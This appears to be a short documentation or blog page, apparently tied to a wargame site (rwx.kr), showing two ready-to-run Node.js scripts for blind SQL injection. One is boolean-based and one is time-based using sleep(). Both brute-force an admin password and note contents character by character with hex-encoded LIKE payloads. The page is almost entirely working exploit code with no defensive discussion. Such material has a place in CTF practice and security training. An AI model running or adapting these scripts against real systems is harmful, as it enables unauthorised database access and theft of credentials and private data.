Sql Injection with NodeJS

 
 
  Docs
 
  ,
 

Blind

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
const request = require('request');
const dict = '0123456789abcdefghijklmnopqrstuvwxyz={/}:.,_';

option = (query) => ({
	"headers": {
		"Host": "rwx.kr",
		"User-Agent": "Mozilla/5.0",
		"Accept": "text/html",
		"Cookie": "PHPSESSID=posix"
    },
    "qs": { "pw" : `' || id=0x61646d696e && pw like 0x${Buffer.from(query).toString('hex')}25 #`},
	"method": "GET",
	"uri": "http://rwx.kr/page.php"
});

function exploit(data = '') {
    for (let chr of dict) {
        request(option(data + chr), function(err, res, body) {
            if (body.indexOf('Hello admin') !== -1) {
                console.log(data + chr);
                exploit(data + chr);
            }
        });
    }
}

exploit();

Time based Blind

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
const request = require('request-promise');
const dict = '0123456789abcdefghijklmnopqrstuvwxyz:={}./_';
const delay = 2;

const option = (query) => ({
	"headers": {
		"Host": "rwx.kr",
		"User-Agent": "Mozilla/5.0",
		"Content-Type": "application/x-www-form-urlencoded",
		"Cookie": "PHPSESSID=posix"
	},
    "body": `order=(select concat(title,0x3a,contents) from note where id=0x61646d696e)` +
            `like 0x${Buffer.from(query).toString('hex')}25 and sleep(${delay})`,
	"method": "POST",
	"uri": "http://rwx.kr/"
});


async function exploit(data = '') {
    for (let chr of dict) {

        var query = data + chr
        var begin = new Date().getTime();

        await request(option(query));

        if (new Date().getTime() - begin > delay * 1000) {
            console.log(data + chr);
            return exploit(data + chr);
        }
    }
}

exploit();